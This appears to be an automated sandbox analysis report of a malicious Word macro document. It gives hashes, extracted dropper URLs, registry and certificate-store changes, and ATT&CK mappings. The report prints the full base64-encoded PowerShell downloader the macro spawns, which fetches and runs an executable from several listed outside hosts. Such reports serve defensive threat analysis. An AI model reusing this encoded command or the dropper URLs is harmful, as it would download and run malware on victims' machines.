4b22feab70ea7d7acacbfaa93a8e2f6e0c3cd2520c63603caff2a970a78b1ea3

General

Target

SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092.doc
Size

174KB
MD5

3c20d0817d04e702fd5166fc3ce8594b
SHA1

a984d3e6856342ddc5d6bf48d7de645ba8084cc1
SHA256

4b22feab70ea7d7acacbfaa93a8e2f6e0c3cd2520c63603caff2a970a78b1ea3
SHA512

623f619e0ea82ef2979ad6c8485357b75c6f0cedbcda80d4c4c2198ea721ff3588892c1d4b929b7181f784d66aeea45230275faed12d0ca068e39afbc3a94b92

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.hatchdogs.com/assets/XIw/

exe.dropper

https://groovyboove.co.uk/blogs/8T94mmdka13/

exe.dropper

https://gregemerson.com/wp-includes/hudy17240/

exe.dropper

http://guariz.com.br/WuutjlO/

exe.dropper

http://hafder.com/images/fhq7h7babdbe5q5052/

Signatures

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1420 WINWORD.EXE
1420 WINWORD.EXE

pid	process
1420	WINWORD.EXE
1420	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	1060	powersheLL.exe

Drops file in System32 directory 1 IoCs

Processes:

powersheLL.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\0\win32	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{365F401E-A8E7-402A-B637-3BFC38C14EC3}\2.0\FLAGS\ = "6"	WINWORD.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powersheLL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powersheLL.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powersheLL.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1420 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1700 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powersheLL.exe

pid process

1700 powersheLL.exe
1700 powersheLL.exe
Blacklisted process makes network request 3 IoCs

Processes:

powersheLL.exe

flow pid process

5 1700 powersheLL.exe
7 1700 powersheLL.exe
9 1700 powersheLL.exe
Office loads VBA resources, possible macro or embedded object present

pid	process
1420	WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	1700	powersheLL.exe

pid	process
1700	powersheLL.exe
1700	powersheLL.exe

flow	pid	process
5	1700	powersheLL.exe
7	1700	powersheLL.exe
9	1700	powersheLL.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12183.28160.28092.doc"
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA=
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1420-0-0x00000000003F9000-0x00000000003FD000-memory.dmp

Filesize
16KB

Download
memory/1420-2-0x0000000008880000-0x0000000008884000-memory.dmp

Filesize
16KB

Download
memory/1420-4-0x0000000006CC0000-0x0000000006EC0000-memory.dmp

Filesize
2.0MB

Download
memory/1420-5-0x000000000ADF0000-0x000000000ADF4000-memory.dmp

Filesize
16KB

Download
memory/1420-6-0x000000000BE70000-0x000000000BE74000-memory.dmp

Filesize
16KB

Download
memory/1420-8-0x0000000002100000-0x0000000002101000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads